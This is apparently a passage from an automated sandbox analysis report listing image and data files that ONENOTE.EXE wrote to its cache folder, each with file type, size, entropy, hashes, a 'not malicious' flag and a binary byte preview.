Preview:	2...>...........v.......................................................................................................................................2...>...........v................................I.......I.qk..B.....LZ<.......<..=......w.`..;<..=......w.`..;<....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.................O.x..d........N...^..................E.~.G..?.../.............................................^....I.qk..B.....LZ................O.x..d................O.x..d....*.........<.......<.......<...........................................<..j....<..T.l..<.......<....Q..<....Q..<....>..<.......<.. .3...................;........4...4...4.."..............<...<...<....z...y.. x.. ...........$........4...(..7(..7........................;........4...4...4.........<.......<......#<..............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004E.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 95x498, components 3
Category:	dropped
Size (bytes):	3009
Entropy (8bit):	7.493528353751471
Encrypted:	false
SSDEEP:	48:aRCTf+0hagMrbAZMJShPdvF/5OzlQFlDF7npkDdWvVBTEnBLT6NrgCX0:D+0YgMrApL553JtEdEVcL2NcX
MD5:	D9BD80D40B458EDB2A318F639561579A
SHA1:	83BA01519F3C7C1525C2EA4C2D9B40F28B2F2E5E
SHA-256:	509A6945FACFB3DDC7BE6EE8B82797AD0C72DB5755486EE878125A959CC09B59
SHA-512:	C368499667028180A922DD015980C29865AEF4A890C83E87AE29F6A27DC323DD729E6FB1C34A2168A148E6A7A972F65A5FC8ACE6981AF1D4E7057D99681CB366
Malicious:	false
Preview:	......JFIF.....H.H.....C....................................... ! ..''*''555556666666666...C......................&.....&,$ $,(+&&&+(//,,//666666666666666........_.........................................:.......................r.!12BQ...3Aaq.."CRb.....#4$c.S.....................................................1A............?..p..-.....u0$.......l......)..o.FTd..DG....... .te..jO..Z.U......r..j.O.,..VD./.....V5D.&......A..Zi....E.N..............#..M<\|.2.Y.../QO.x.cTM4......+.F;V.x.de....]e..O.x.c\Y........r..j.O.,..T...hw..k.^.[B..J.sEl.w.x.m.5%zzt0..T.......b..<\.3Q..W</..!.xh6..Z..\.+M.o.Y..1............#.........\|.a.l.KR>..U......e....@...\.1Z...Y...[....F.6.t.#..Z,.x.Q..[`.X......#........W</..TM..-H...V....Tf..........r..j.x.df.f.....#..l.KR>..U......e....@...\.1Z...Y..Y.us....D.)....Uh....FkYm.m`P...W .V.g..FjVj.\..1Q6.t.#..Z,.x.Q..[`.X......#........W</..TM..-H...V....Tf..........r..j.x.df.f.....#..l.KR>..U......e....@...\.1Z...Y..Y.us....D.)....

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004F.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 700x114, components 3
Category:	dropped
Size (bytes):	2266
Entropy (8bit):	5.563021222358941
Encrypted:	false
SSDEEP:	24:TuRCTP9rSTfIEe1HbcVY1YbDXq8eCI0bf2QQe0GVDQAzZw:aRCTN7HbcW1YbDXq+I07Ien0AVw
MD5:	DB8A181E3F0EAD4A9472099E42ED6BE3
SHA1:	92096AF05CC6167B1AA816811A1160B809393FA2
SHA-256:	E9746B4E9AE9CE7B3B0068779DB3E113E2DFC9880F25373D745D0E700E69A906
SHA-512:	A9E246E10E28D057090BA9F034ECE6131780D7F794C5C9421523388997C7EDFBB49BC32B863B6C6668911B359C304AA54969B48CB9234950D5CECD2A6F3EFFF8
Malicious:	false
Preview:	......JFIF.....H.H.....C....................................... ! ..''**''555556666666666...C......................&.....&,$ $,(+&&&+(//,,//666666666666666......r...........................................5.......................!1AQ..2a...."Rq..#3BSr..C..................................................................?...X.....U...j...F.W.V]'KV.uWt.iT...{.......`.(.....V%..=.....z......V..ct+.U.B...@.............................................{.....5.........0...x4....c..;...........+......\|.7E.%.9.1+}..d.........+.V#.P.HUL.E...g.li...8.>U.";0pi.]5.\..zo..."@.........................................y.6.mLN..S.....@...i..A..p.......~\|V9.+.Xy.........+,L.....7Z7..p...-X...\.....:-...i....v.1...-..H....9.zk....l....^.......:.."^.t.Q.F...X..B..$............................................a.%f&3..1.5+.X..'b7bwr.).e.x....!...H...aa_..kD...b..g..p..K^.k..qX.[,.........Q...U..x...YMvj...w..:k.....j.W.8..4....c.u.}m.....o.=@.......j.S.t.\|.....5h.y.%.~...G

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004G.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.32167306282929
Encrypted:	false
SSDEEP:	48:YuasSoAMpuPtMD0EgKXTjw9aItoVrdQqreWo2BXsFP0h2bJ:YFsxuPOwELXTE9aItsRQyNo2B+
MD5:	4D9E9D612F11B051ACD92C9022207940
SHA1:	EF4A9F827848948529CAB9CB85184A70ECCC9461
SHA-256:	835AA3E6B0D1B2B98F5CFDA5E666BBE6A47F7607CBE3D5CD23B5E9057C3F9B23
SHA-512:	5F84B825D6E6C6CFF2C82416D4906A22A3FF33BFC9ABD7894CDB64EB74F940329325E770F57405465235FAACB93A817A6EB1D9FB01B9B447B7CF1A48C9600929
Malicious:	false
Preview:	2...>.......P...v...D...................................................?....?..........................................................................2...>...,.......v...x............................I.......I.qk..B.....LZ.$M......$M........#...$M........#...$M..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............N..$.D.#8dc."g.....N...^.................T...uJ..6\|X..3........f........................................I.qk..B.....LZ.............N..$.D.#8dc."g..........N..$.D.#8dc."g...........$M......$M......$M..........................................$Mj.....$MT.]...$M......$M..B...$MH.....$M..B...$M..>.).$M..J...................;........4...4...4.."...............$M..$M..$M..z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4..........$M......$M....#.$M............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004H.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 813 x 99, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	99293
Entropy (8bit):	7.9690121496708555
Encrypted:	false
SSDEEP:	1536:Moq1jVORV5NO5xLCBaaNk4vhpCr1CH/DATOQlWvHMHojiaAMrxArLFRZPj19AWFz:eVEbouBaIk4T8uDGOQlVHvaAMkhDh95V
MD5:	EA45266A770EEA27A24A5BB3BE688B14
SHA1:	9F0B23B3C8EBA4FC3C521E875EF876FBE018F3C8
SHA-256:	EDAD0F03E6FF99FEF9EF8E8B834CE74F26CD23C5F8C067F5CEE66F304181E64D
SHA-512:	D4EE36BDA897BBD643A699A0332DD00DE9CDCC6F46D861789BAD259A4BF87868AE3B4CFAAB6DFAF29941C7055B77A95D76BAA86A4A0DB2BF3BAF7E3317F03EB9
Malicious:	false
Preview:	.PNG........IHDR...-...c............sBIT....\|.d.....pHYs...........~.....tEXtSoftware.Macromedia Fireworks 8.h.x....tEXtCreation Time.05/15/06.8.p....prVWx..[Oh\E...y3kv........`.%m.R..6.1.4).o..Ki...D.......P!.].=..K...C[....f.}o7VPJIg...{3.\|....d.....i..=.4.u0...n y......@j..Q..f)..mQ...4-SJ..9.d.?..5\-....:b.W..i...c.5..{..pj#.....B1C/.I.......].Su.k?.2..:.9Q...5.U...UZ...e..U.c],..2.}...1..)W./..Epr.Zt.....K.=..{......e..."...v..B.4.#....A.V1.".V}t..[..2f..Y..V9.".6.......(..gbm.P.....Y%2.c.z.:Q.2.<tYF.....u.@..KJ.;u.q:.].....$.....V....Hqk..DW.l.e.j.Z.YP?:'R...<........6...m@..r..j2..HK"\|..L.Nc..D..y.9..B4$.......`.3.m1LE....7(OU\+./.O...%6T..w......h....).I.&n.........#..W.41...5.#.`..I...<.?.\|..+Q.....#i........$,..n...`.s....[..E. T.w..j.,&-.r..;a....#.>(.P......f...MU\3..;B....)..5....z..(....-...a.....}y.l..E...z>......&..g.$.....*T...N....E:./.>..#...^..E.0..%......(..@..W.X.NDM.<~.]A.>..fW.O.y.'...Z...h..).F..

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004I.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.355808316744964
Encrypted:	false
SSDEEP:	48:Yu4ns7c909Gxt9g/0EVpydX/+sOY69ScdoVrdQqr4hs9BXUlogZ:YpnsicGxtEP2X8V9SGMRQy469Y
MD5:	3DD53E6BB3D3619C4EB6B53E3AA85ACC
SHA1:	140896D6E1574CEFA60A8C1B86323A4BC0A1840F
SHA-256:	FBD3377268B7AA625BC32D73F75D47803C0717E03306EEBD971DEA5DFB46883D
SHA-512:	83045BF63E6E4DDA6BE0FC6B2310467183A08F083994251488D811A6712943F3755CCA1E263F65E99BD99688BAFC12AA7C2390C2979B6D4FB32E386F15630A06
Malicious:	false
Preview:	2...>.......P...v...D...................................................?....?..........................................................................2...>...,.......v...x............................I.......I.qk..B.....LZ=.s.....=.s...R....gGN.I=.s...R....gGN.I=.s..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............w.Qf....ZPFg......N...^.....................J...a.j@........f........................................I.qk..B.....LZ.............w.Qf....ZPFg...........w.Qf....ZPFg...........=.s.....=.s.....=.s.........................................=.sj....=.sT.]..=.s.....=.s..B..=.sH....=.s..B..=.s..>.)=.s..J...................;........4...4...4.."..............=.s.=.s.=.s..z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4.........=.s.....=.s....#=.s............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004J.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 780x107, components 3
Category:	dropped
Size (bytes):	2898
Entropy (8bit):	7.551512280854713
Encrypted:	false
SSDEEP:	48:N9YMTXc4gpw+EIWnqQ5G+NE9VTzRFvS4+Xh+AKrNx+JuCluc3Eeky8etajhDCFex:/hDc4rPIoNEzbS4+XhOrGJu1cUHeoVey
MD5:	7C7D9922101488124D2E4666709198AC
SHA1:	00CC44A1B84D4D94A0ACE8834491EB5F65D04619
SHA-256:	20016E5FA1A32DCE5AF4E92872597E36432185A7BB2E61C91F362BD68484529B
SHA-512:	882944B2CF040485899128E03B7499C540D481E45FE8017DBF4FE0330157B2D8ABB7334DDB31C112BA0EFE3722A554883917C54155A7F60044D2D7F3D848260F
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......k....".......................................2...........................c.....TUb...Sa...QRqr..............................!.....................Q...R..!..............?...$.)m.1...%%bV.J..H....-.%a[...I"WJ..:.X.:TT.$.......N.-NR.E..-NR.E...9..E....$.k.....B.I,I)..J...kr..+)..I,Yj..YbI..+,J..e..Z..V.e.$V..TV.X..V.YQZ.EQ..U%PY[.[.R.EP............................\| F.. ...j...!m.!j.I%.j.$...YeEYYEEUE..eY[.hEEUeEil.....%..el...V..TUYA.U.UTTUT.Z..UQQUQE...V.,...UlE.U[.lEP.P.@......................................R1...AR1m.....#..$:.T.p..IJ.t.....A..AH.,5..]F!a.XJFaa. ..a.!.aa. X.e.......bB.b..,HX[,!..,,.c0.,..U..X..(,,...B(.,..4..B.`..".a..-......"...........................>D..IKEb...t.....)u.....)K.%+L\.J]i)*b.JR.IIL\i)u....T............T.....qs.it.iJ...])ZJb.....X....U.A...V1..B.R1....X...,.c...,%X...,%#0...,H

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004K.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.344944829541031
Encrypted:	false
SSDEEP:	96:1ssOcP1XEdwESh1Xxn9qr8RQyRpuztT9ItTaCg:1ssdPkyXV9qr8RJRpu
MD5:	543E0CF2963D774F3EE535A6F7C52BCB
SHA1:	99C70F8132D48E31F5E6417866E3B9F37011527F
SHA-256:	1275ABA59DDF99A571418F485279FC70C6717C571FDF93C37F621785E348B081
SHA-512:	675EB694ADDF101AE06C490547480CF7610880E1C654C5F302894DEA6BC5C607A2F5A0FC18CC394F76ABE34B71B73493CE6FC3FA2DB8165E3CE01EB38DDE1EF1
Malicious:	false
Preview:	2...>.......T...v...H...................................................................................................................................2...>...0.......v...\|............................I.......I.qk..B.....LZ..9.......9o.o&.7........9o.o&.7........9..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............<.(... .q.e.:z....N...^................Fa....A...(U-d........f........................................I.qk..B.....LZ..............<.(... .q.e.:z..........<.(... .q.e.:z...........9.......9.......9...........................................9j......9T.]....9.......9..B....9H......9..B....9..>.)..9..J...................;........4...4...4.."................9...9...9..z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4...........9.......9....#..9............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004L.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 613x144, components 3
Category:	dropped
Size (bytes):	29187
Entropy (8bit):	7.971308326749753
Encrypted:	false
SSDEEP:	768:RwjBOlCk+nYnGagKJWJhwMJiRO22ZIm4VXvXx1tA6BQs:i8snY3JW7uROlEfbtVL
MD5:	DF99CAAAB9A7DE97B63343E60A699AB6
SHA1:	B84334135CFB73BC6EF55F85926770D5AC6DFEA8
SHA-256:	74C131777E7C437FD654427417097BC01B0813BA8E1E50E4B937BD50A1BEBCDB
SHA-512:	5D15AAAA8B71DDFE01A7C0ADE16D9E1F5E9AAE484BCD711B38CCB103ED9564CAAC23A0031471167B660E15972D70179C2A387509B213C05D60261042A0456025
Malicious:	false
Preview:	......JFIF.....H.H.....C....................................................................C.........................................................................e..............................................`.............................!1Qq...2ARa..."#.....3BSbr...$4C...Tcs......%&DUd...E....56Fe....................................H........................!1Qa..Aq..."b....2R...BSr..#...3..Cc....$%4...............?...b.d.8T1.;#.S.DO...~.R.......3.xe...z.6..."m..k...;.'.f.5^.....m..<$....8.R.j.D.v..>...dT..vGbt...I......sEWp.r3.. ..G...6.....w...l.S..q...b.....-R....^Zu5+u6...A..Z].:...5..Uzn.,l.L.....?%..S.+zVg7.=.s.Q.....8..:,c.......ZE...>'IF..W.0.d.......c.e.d.V.t..S$.DNR.[....g..#i.$. .U.SK2.....k...J5u u\R.....T.[4..A.O..,.T..................] .i...B.m.^f....._...{S.....<......:..\|D...+...NA....Y.^f.1\|..%K~1..B..^...S..v=.c..g.tX[..kTJ..t.gr....R..@.F....5j..2.K.9..g.1N......U...^w......>+.l.v...@N....%Qd...t.Ni.....0;lggm...K".+!.,.....[J...>..?f.]._;

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004M.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.344120179473206
Encrypted:	false
SSDEEP:	96:hes7UgYI+H7EYY6nXJG9gAz0RQyOCbqUCUqUaUPUCDgUxU:hes9YJ4xQXJG91z0RJOe
MD5:	7487ED30F91607E03F39E7917FE8613A
SHA1:	A45156BD9F8663A66A07C401A4DDBF2E23AB5766
SHA-256:	41B7B61B282913F42C188A00DB84985B87125871BF768A552DCC423BFACBDA88
SHA-512:	039F4D673FDFD7A47D2F3F8C0E7EFE7F4FF07EEA10886EB085AFBC09CA63C441B9AC2A9E72957099739B597ECC0429E110F9439FC531F3683A3F8CD4C4117867
Malicious:	false
Preview:	2...>.......R...v...F...................................................................................................................................2...>...........v...z............................I.......I.qk..B.....LZ. j...... j(9.....d..C. j(9.....d..C. j..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............6.r.16...#..QaU....N...^.....................%D.T.w...........f........................................I.qk..B.....LZ............6.r.16...#..QaU........6.r.16...#..QaU.......... j...... j...... j.......................................... jj..... jT.]... j...... j..B... jH..... j..B... j..>.). j..J...................;........4...4...4.."............... j.. j.. j..z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4.......... j...... j....#. j............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004N.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 276x139, components 3
Category:	dropped
Size (bytes):	4819
Entropy (8bit):	7.874649683222419
Encrypted:	false
SSDEEP:	96:/hnQiz+ET2/hDi+tv34VtpWfowTHgegb6hhLT1NTS:5nQ6TAhLtvIzMvbi6hhF0
MD5:	5D6C1F361BC04403555BE945E28E53FC
SHA1:	00C254F7B3BC0289590C2BBDBB39C8EC2E2B2821
SHA-256:	131D637CDC5D0B094FB9FAD17F4D2A1ACE0D03613588155AACAA2D1CB4E16DA9
SHA-512:	34D2C0929FCC3CC10D0A2121BD55BFA9A07062C2A7B8F101071164C946895DBCB2777641E79DE4193D57A3F0778DD4F1351FAF333B7E4B4DBE31A32DD69C51F9
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222...........".......................................<........................!1..AQaq"...2B...#Rb..r..$3CS.cs..................................................!1A............?.............u....p.p($.Y...9,j...V...S86yh.G.#m.5..9...6Y.."C.R:.[..-.7U3c:..].;.....f.?%..<T...&F.Lh.N...m]..x.D.g<B.....k..S........>j.K....#U..Z....<e.:..8....o..xq.[..4v..U..y...k... k....A#..A...pn.jJ.I.7:..{.b..ns.t,...8.Td.I....m.I.5Z.).-.. ]..X.Do%.....?..4jV.`llt.E...5...u.\|..\F.=.F.r<...5dV....xc.%..&...4,...f...3..H.<......eQ...P.J....7...lLc..?..-.fR..7.#.6.......}:.]'.ny..........e;u.Y..$0...i..-....f..9(....}..T,.Inb...+=Cca7....WULA1@.s...4uY5.N.f.c..].ks.....3v..~..k..m)...f gNE`S......#.....Z..6.uc.m...#k.s.f.l.$6..?..xC.Cm.`...N2..&H...._.&.E...[....f.Z./...!.a{K..#.V.5..v.B....1...9..B.&....%s.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004O.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.350401840853826
Encrypted:	false
SSDEEP:	48:pJixXBssNyaJ2CDmtIm8EnV5YZXx9OEoFrdQqruggfsBXM3k+aVx:yBsYr2CDm6fEVOZXx9X8RQyafs0O
MD5:	B2C78708EEB911763F075E152B53E719
SHA1:	E9E77EB53D23959F826F194DF6B45715CAE31552
SHA-256:	8CDE3E38723918C5DF9B85DCF2B962369DA5817CC4C238424CA0BEFB69361B81
SHA-512:	2C0684010916A6813B34E6B78B803A0EC70895A14CD8E48D8836268A46A160DF593C12591EE0DCAAFB1FE283D7A8F216F0F8E520250A0E39DAD0B8F2861DC460
Malicious:	false
Preview:	2...>.......V...v...J...................................................................................................................................2...>...2.......v...~............................I.......I.qk..B.....LZLs......Ls.-.........._.Ls.-.........._.Ls...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............f.5^8.....R..R....N...^...............~g...L.H.q....^.........f........................................I.qk..B.....LZ.............f.5^8.....R..R.........f.5^8.....R..R.........Ls......Ls......Ls..........................................Ls.j....Ls.T.]..Ls......Ls...B..Ls.H....Ls...B..Ls...>.)Ls...J...................;........4...4...4.."..............Ls..Ls..Ls...z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4.........Ls......Ls.....#Ls.............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004P.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 814x45, components 3
Category:	dropped
Size (bytes):	1717
Entropy (8bit):	7.154087739587035
Encrypted:	false
SSDEEP:	48:N9YMzO6BOfqH/dAIWpdAIWpdAIWpdAIWUtr/SD:/hzJgfqHaPYPYPYPUt/i
MD5:	943371B39CA847674998535110462220
SHA1:	5CA79B7BD7E0E93271463FAEF3280F1644CBA073
SHA-256:	9C552717E8D5079BBB226948641FF13532DF3D7BE434C6CE545F1692FA57D45A
SHA-512:	812541836C8B6F356A4D530E5CCF1CFDCC4CA54AF048CAC19FE86707CE5EA0F41D73C501821AC627AD330291EF58C040DFC017923A7886CEEC308048DA2CE7C9
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......-...."........................................&.....................U.....1T..S.R.Q.................................................R....Q.a............?..d.. ...............................................+A...Z+E...V+E...U..R.....}........Q..Ah....Ah..b.AX..b.PZ+A...V+E...V..J....Q...b.Q..Ah....Ah..b.Ah..b.PZ.(.@z.?.`;2.......................................................Q...b.Q..EZ.(..Z>.G.....`Z+E......J....F+D...F+E.......b.Q...h....PZ+E...V+E......J*....F+D...F+E..............[u#...a-...f<.9^[...l0..H..6.Kn.t...&..3a...GG...[u#..8.y6.q..%.R:8....6a.+.3..a-....l0..H..9^M..f..m..3a...GM.q..m..6.Kn.tq..%.R:l.W.lg...[u#...a-...f.r..c8.....f..m..0.....l0..H..6.Kn.t...&..3a...GG...[u#..8.y6.q..%.R:8....6a.+.3..a-....l0..H..9^M..f..m..3a...GM.q..m..6.Kn.tq..%.R:l.W.lg...[u#...a-...f.r..c8.....f..m.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004Q.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.327993359644271
Encrypted:	false
SSDEEP:	48:+swxJpbqorUZRntg3vOJlEKd79MXHSJ69qaeo5rdQqrda0BXJcqq7BYv1UwZg:+sXZ1iGTEKd5MXHSJ69EQRQyw0wI
MD5:	790FA9B5CE471BDB6926A9642BCA0004
SHA1:	9A955F60B6C73249391ABA336FEC73991E0BCDAA
SHA-256:	25F8A0F9E5D221AFE15F43C6AA3B465EFBEE3543E53AE4B588E13ECA7A169E62
SHA-512:	4BFAA78A923CCE302E7889560AC0E712D17A23FB4373B2957B95C209335B6183A9BD8A17A29CE6FE228F0C52A70A4C3818DE63A2CD83C557423CE97E05449518
Malicious:	false
Preview:	2...>.......T...v...H...................................................................................................................................2...>...0.......v...\|............................I.......I.qk..B.....LZ.D:......D:4......X..m...D:4......X..m...D:..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............tp..."....=......N...^....................}K...k:.........f........................................I.qk..B.....LZ..............tp..."....=............tp..."....=............D:......D:......D:..........................................D:j.....D:T.]...D:......D:..B...D:H.....D:..B...D:..>.).D:..J...................;........4...4...4.."...............D:..D:..D:..z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4..........D:......D:....#.D:............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004R.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 262x277, components 3
Category:	dropped
Size (bytes):	3555
Entropy (8bit):	7.686253071499049
Encrypted:	false
SSDEEP:	96:/h3JeYCQV5Hn++9HBdAjU78S/mjLLwqnqahJD:53Je8b+EBdAjm8S/mjLLRnphJD
MD5:	8A5444524F467A45A5A10245F89C855A
SHA1:	ACE68D567B02B68275E0345C86DB1139C0EC1386
SHA-256:	7D2B01F17354D9237A6AB99D5B9AFDF0E1CC43687125848B0C2DEDFB44CE3843
SHA-512:	8151B447B60D110C32EC1EF286B941FFC09B99140F41BBACF5A1650A385FF4D13C0DDB2878E9A470FC7CFCC95A1AB6E44F6DE72562B0FFE093DC8A3C3C7FCC14
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222...........".......................................2........................!1AQ.a."2q.B..#R...3C................................ .......................!1.AQBq............?........)&vD.)3Hn..X+....r...tmL.k..(.E...R. .Z..&...,fJ...!...6..S\t3.=...g&..Bqe.)_U.....1......-..fl.................J...u.i.mU..K..v.w.0O..E.h..D~K.(..9.,8..E.}.............i.\.....t."v..q..C............<..\|3.........................Q..../c.....f.}8....D..\|k..Z......0..~..c..e..m(...\|.c..'.5.5............==bx.5x.8...T;....=.--.pc...I;.V.m..,(....}...NH.ho....Q..U.E$.~...w.t>.S\....'f.{.+.g._.t....;>.....P...........-..G.h..2...J.% !.E97Ir.D..N....j...oE._...._...".?.......#".S.........Q.Tc.I..*I..k.......=$.........sk1Jp.\K.....F.3.Q..q..J....N..[l.&....OR4bB\|..2ul....J...B.$&H..9#j.f.n./........?R~....B.I.@..........m

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004S.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.291683238275323
Encrypted:	false
SSDEEP:	48:YTsZpRK8U9k5tvmQOd94ElAXZAD9yZGo1rdQqrbwdkWBXwZS990ZZuZJ:MsDBUC5IQnEOX+D9DURQyEd3UZK
MD5:	C157B91C900FF976A9225731E2DD28A6
SHA1:	369A74CAF19665B8A735EF85CDD671C2C88F1C2B
SHA-256:	8575B558CF241913AE6A5CB1BA70A4F4B45B68B1F81DE53E8189FDD6845B7613
SHA-512:	3142CEC26805F7ECAC1ACD96B56B45D3A6B879CD3E52C1CF0C0E0A67850081E45895BC9725CE4C3282E42A252615CF8C95C1D207C11E04ECB823781AC52DD717
Malicious:	false
Preview:	2...>.......R...v...F...................................................................................................................................2...>...........v...z............................4.......4.O...1O.S..'.I.......I.qk..B.....LZ.4.O...1O.S..'.4...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'................_q.\|.....W......N...^...............Iyx,.8.K.......W........f........................................I.qk..B.....LZ..............._q.\|.....W............._q.\|.....W............4.......4.......4...........................................4.j.....4.T.]...4.......4...B...4.H.....4...B...4...>.).4...J...................;........4...4...4.."...............4...4...4...z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4..........4.......4.....#.4.............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004T.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 70x626, components 3
Category:	dropped
Size (bytes):	3428
Entropy (8bit):	7.766473352510893
Encrypted:	false
SSDEEP:	96:/hdu7isPwAp7zesusUyYAatNG87llTONQYS:5di5tfuQ9atNZlaC
MD5:	EE9E2DF458733B61333E8A82F7A2613D
SHA1:	A86704C969F51B86D6A05ED51C6C60214ED9FA89
SHA-256:	BE4F0E6C89FCE91B9EBD2623567F7DFC259E0E3C77C9158742B8F64B724DF673
SHA-512:	BFB5D6DD6B66EE21E946E90D1E482384CD10244308562DDA814189602681DADDE5752B80519E5B8515F115A71BD6BB4317A59BE65B8B5E3474AED119F8303569
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......r.F.."........................................H............................!Qaq.."12.....#3ARbr...$B...cd...&CSu.....................................+.......................12..aAQ.!#q.."................?...#...3.Za......rV.5&...../"..i.t...j..W........d.FL.V.2K....]t.f.d.NK..:.....f...... ......2.[...#..D...ZK....p.z.E.N..T..L.-....1....2.\.6FIr2..zS\U#..........fB\t..5J..~q...D....A.......!....MY..../.HY..../e.M.Y.n.~..,....'..Pc...l...d2..m.f.it$..qx-z...._..].cOO....n..&.....FIA.....2J2..d:<qc..6.I.G.N....f.K..Dx.-.......`....2.FZ."K7.r}..<.P.Z.da.Y.....8..s....G.....b.e..g .S.......FL.Z,&..q.MG.J+..x\..m...qN=.....)..`...&Y...S....u6{.z.g.....@......FL.ZL&.Iv.w..8....U..v....q.B.v_./A..#.#.g.j........*J;...u...W.Ao...%....#$.....M..^\{W.SO...s,.N.....c).,.B.Gv...."k..z."..S]H.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004U.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.377445874339815
Encrypted:	false
SSDEEP:	96:VQ/sQ75pMEXNrxMXIXf39GgRQy/IniM2k:gsQ7pXNmXIXv9GgRJ/5M
MD5:	3FADFD78E7DBBE1D4E1BA4FF2101C24E
SHA1:	4F43FE6A6EB78E270DB657B8E12B349916A8F4BB
SHA-256:	1BE1D6D93A1B94DE39794BFB0F7CEC1659F3B481E051FA66A1D29189D70D260A
SHA-512:	00AAE846D8C27C08AAC832614525238002A184773B2F0D2A8F5DBB5849436B18316CA00A6D604BD35EA751AF069B672A3D997C6A2966A14300B380B89ADDD1F1
Malicious:	false
